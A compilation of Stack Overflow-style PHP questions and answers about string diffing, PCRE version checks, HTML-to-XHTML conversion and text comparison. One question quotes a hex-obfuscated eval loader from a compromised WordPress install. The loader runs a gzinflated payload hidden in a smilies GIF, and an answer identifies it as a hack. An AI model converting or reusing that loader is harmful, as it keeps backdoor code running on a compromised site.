Character-wise string diff in PHP - php

In short I am looking for something like google-diff-match-patch in PHP.
I have had a look at some similar questions at SO, and also at the algorithm provided here, but all of them fail:
diff("draßen", "da draußen")
should not give
<del>draßen</del> <ins>da draußen</ins>
(which is kind of stupid for my purpose, because I want to compare file names), but (try here)
<ins>da </ins>dra<ins>u</ins>ßen
Is there a code snippet in PHP that does this? Unfortunately, I cannot use (i.e. install) external packages.

https://github.com/gorhill/PHP-FineDiff supports character-wise diff and can render the differences in HTML

The PEAR Package Text_Diff provides Inline-Diffs.

There is a php version of google-diff-match-patch available here: https://github.com/nuxodin/diff_match_patch-php

There is a port of fresh version google-diff-match-patch library.
It is much faster than previous and have no problems wth utf8.

Related

Wordpress update preg_replace to preg_replace_callback

I'm updating my website's PHP and when I try to update it to the most recent PHP version I get this message:
Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /home/customer/www/---.org/public_html/wp-includes/init.php on line 291
Here's the line I want to change:
preg_replace("/.*/e","\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b","");
I need to change it to preg_replace_callback but I'm confused by this part:
\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b
How do I translate that part?
When I use an online decoder it looks like this:
eval('$pagexyz = #file_get_contents("wp-includes/images/smilies/icon_wtf.gif");eval(#gzinflate($pagexyz));');
I've not looked to deeply into this but, are you supposed to have a wp-includes/init.php file?
Official repo shows no such file for the latest version
A quick google suggests this is the result of a hack, search "wp-includes/init.php"
Also examining the code i see "wp-includes/images/smilies/icon_wtf.gif" why would what the f*** .gif be in the core? And the encoded function here smells very fishy.
Post about the potential hack
https://blog.tonyballantyne.com/2017/01/25/wordpress-pharma-hack/
You shouldnt need to edit anything inside wp-includes/ as its a core folder. It would make sense to install a Core integrity checking plugin and maybe update to the latest version, you cant guarantee the database hasn't already been tampered with.

Determine if PHP installation preg_* functions support multibyte regular expressions [duplicate]

Is there any way to get version (and date of release) of PCRE bundled with PHP from PHP code and store it into variable?
I can found it using phpinfo() but can't find any other way to get that value directly from code.
I was trying to find solution last couple of hours but it's hopeless.
So far, I can get complete phpinfo() output in variable and pull out PCRE version/release date from there but I'm wondering is there easier solution?
You can also use constant PCRE_VERSION
found source here
I think the ReflectionExtension class is made for this, though I can't seem to get the version out of it directly (getVersion() returns null). This does work however:
$pcreReflector = new ReflectionExtension("pcre");
ob_start();
$pcreReflector->info();
$pcreInfo = ob_get_clean(); // Version and release date can be parsed from here
You'll still have to parse it, but at least it's just the relevant part and not the entire phpinfo output.

How to convert HTML into XHTML [duplicate]

This question already has an answer here:
Closed 10 years ago.
Possible Duplicate:
PHP library for converting HTML4 to XHTML?
Is there any ready made function in PHP to achieve this? Basically I'm taking HTML data from Smarty template and want to convert it into XHTML through coding.
$filename = 'template.php'; // filepath to file
// All options : http://tidy.sourceforge.net/docs/quickref.html
$options = array('output-xhtml' => true, 'clean' => true, 'wrap-php' => true);
$tidy = new tidy(); // create new instance of Tidy
$tidy->parseFile($filename, $options); // open file
$tidy->cleanRepair(); // process with specified options
copy($filename, $filename . '.bak'); // backup current file
file_put_contents($filename, $tidy); // overwrite current file with XHTML version
I don't have a Smarty template file to test this on, but give it a try and see if it works correctly in converting one. Backup your files as always when running something of this nature. Test out on sample files first.
The problem is that you do not have an html file to work with. You have a php template written in the programming language "smarty" that is not markup, even though it contains blocks of markup. You're looking for a magic wand and no such wand exists.
If it was purely html, then you could probably use Domdocument to read the files into a Dom structure and generate xhtml, but that is simply not going to work with the pure source files, although you could potentially write a parser to read the smarty tpl files, look for the html snippets and try and load them into Domdocument objects.
With that said, I have to ask first -- why you really want to convert to xhtml when xhtml is basically a failed standard that is obsolete at this point in time, and secondarily, if you have some legitimate reason for wanting to forge ahead, why you can't use some regex search and replace snippets that change the doctypes and some regex based searches to look for tags that lack the end tags, and the other relatively minor tweaks needed. The differences between html and xhtml can be boiled down to a handful of rules that are pretty easy to understand.
In answer to your original question: sort of. Core PHP -> DOM, SimpleXML, SPL = templating engine. That's why (and how) templating engines such as Smarty exist.
Re: installing Tidy as suggested in comments,
Tidy has a prerequisite lib. If you don't already have it:
http://php.net/manual/en/tidy.installation.php
To use Tidy, you will need libtidy installed, available on the tidy homepage »
http://tidy.sourceforge.net/.
To enable, you will need to recompile PHP and include it in your config flags:
"This extension is bundled with PHP 5 and greater, and is installed
using the --with-tidy configure option."
So, get your existing config flags:
php -i | grep config
and add --with-tidy.
However, this is probably the wrong approach. It does not solve your actual problem (outputting XHTML instead of HTML) - it fixes Smarty's problem. Recompiling PHP to add an extension so you can use it to fix a templating engine's doctype shortcomings probably means you should consider using a different templating engine, if possible. That's sort of drastic (and adds a lot of overhead for what you get, which amounts to for a hacky non-solution bandaid workaround retroactively repairing broken output.)
PEAR's HTML_Template_PHPTAL is probably the best solution to your problem, and the closest answer to your original question.
And if PHPTAL doesn't quite cut it, there are at least 5 others available as PEAR libs to choose from.
pear install http://phptal.org/latest.tar.gz
Or it's been ported to Git:
git clone git://github.com/pornel/PHPTAL
A cursory google search: http://webification.com/best-php-template-engines
HTH

How to get version of PCRE (bundled with PHP) from code?

Is there any way to get version (and date of release) of PCRE bundled with PHP from PHP code and store it into variable?
I can found it using phpinfo() but can't find any other way to get that value directly from code.
I was trying to find solution last couple of hours but it's hopeless.
So far, I can get complete phpinfo() output in variable and pull out PCRE version/release date from there but I'm wondering is there easier solution?
You can also use constant PCRE_VERSION
found source here
I think the ReflectionExtension class is made for this, though I can't seem to get the version out of it directly (getVersion() returns null). This does work however:
$pcreReflector = new ReflectionExtension("pcre");
ob_start();
$pcreReflector->info();
$pcreInfo = ob_get_clean(); // Version and release date can be parsed from here
You'll still have to parse it, but at least it's just the relevant part and not the entire phpinfo output.

String/Paragraph/Document comparison in php

I'm trying to add a feature to generate a difference report between 2 20,000 character sections of text. I've done some Googling and I heard about Pear's diff library - which has been discontinued - and found this: https://github.com/paulgb/simplediff/blob/5bfe1d2a8f967c7901ace50f04ac2d9308ed3169/simplediff.php
Ideally I'd like to see what was removed, edited, or added and be able to show that to the user. Are there any libraries or simple ways of accomplishing this that you may know of?
I use this code in a live project
http://svn.geograph.org.uk/svn/branches/british-isles/libs/3rdparty/simplediff.inc.php
Example use
http://svn.geograph.org.uk/svn/branches/british-isles/public_html/article/diff.php
but the code is very simple
$a1 = explode("\n",$file1);
$a2 = explode("\n",$file2);
print diff2table($a1,$a2);
(the code just accepts the input as arrays, and outputs html table. But diff2table can be customised)

Categories